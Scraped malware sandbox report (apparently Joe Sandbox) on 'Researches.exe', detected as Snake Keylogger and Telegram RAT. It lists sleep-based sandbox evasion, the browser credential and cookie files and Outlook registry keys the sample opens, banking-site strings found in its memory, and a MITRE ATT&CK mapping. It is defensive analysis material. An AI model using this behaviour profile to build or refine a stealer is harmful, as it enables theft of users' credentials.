Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 594719	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 593985	Jump to behavior

Source: C:\Users\user\Desktop\Researches.exe	Window / User API: threadDelayed 8014			Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Window / User API: threadDelayed 1819			Jump to behavior

Source: C:\Users\user\Desktop\Researches.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsh721B.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Researches.exe

API coverage: 1.9 %

Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7088	Thread sleep count: 8014 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7088	Thread sleep count: 1819 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -599655s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -599078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -598734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -598625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -598516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -598406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -598287s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -598172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -598063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -597938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -597813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -597594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -597469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -597358s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -597249s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -597141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -597029s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -596922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -596702s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -596516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -596390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -596266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -596081s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -595953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -595844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -595719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -595609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -595500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -595391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -595281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -595172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -595063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -594938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -594828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -594719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -594594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -594110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe TID: 7016	Thread sleep time: -593985s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Researches.exe	Code function: 0_2_00402706 FindFirstFileW,	0_2_00402706
Source: C:\Users\user\Desktop\Researches.exe	Code function: 0_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405731
Source: C:\Users\user\Desktop\Researches.exe	Code function: 0_2_004061E5 FindFirstFileW,FindClose,	0_2_004061E5
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_00402706 FindFirstFileW,	11_2_00402706
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	11_2_00405731
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_004061E5 FindFirstFileW,FindClose,	11_2_004061E5

Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 598287	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 597358	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 597249	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 597029	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 596702	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 596081	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 595844	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 594719	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 593985	Jump to behavior

Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: Researches.exe, 0000000B.00000002.3519987420.000000000319F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Researches.exe, 0000000B.00000002.3519987420.000000000315C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`\|
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: Researches.exe, 0000000B.00000002.3542593423.0000000034905000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\Researches.exe	API call chain: ExitProcess graph end node			graph_0-4472
Source: C:\Users\user\Desktop\Researches.exe	API call chain: ExitProcess graph end node			graph_0-4471

Source: C:\Users\user\Desktop\Researches.exe

Code function: 0_2_0040620C GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_0040620C

Source: C:\Users\user\Desktop\Researches.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Researches.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Researches.exe

Process created: C:\Users\user\Desktop\Researches.exe "C:\Users\user\Desktop\Researches.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Researches.exe	Queries volume information: C:\Users\user\Desktop\Researches.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Researches.exe

Code function: 0_2_00405EC4 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00405EC4

Source: C:\Users\user\Desktop\Researches.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 0000000B.00000002.3541070923.0000000033651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: Researches.exe PID: 6308, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Researches.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Researches.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: C:\Users\user\Desktop\Researches.exe

Directory queried: number of queries: 1001

Source: Yara match

File source: Process Memory Space: Researches.exe PID: 6308, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 0000000B.00000002.3541070923.0000000033651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: Researches.exe PID: 6308, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	11 Process Injection	11 Masquerading	1 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	13 File and Directory Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	215 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Researches.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Researches.exe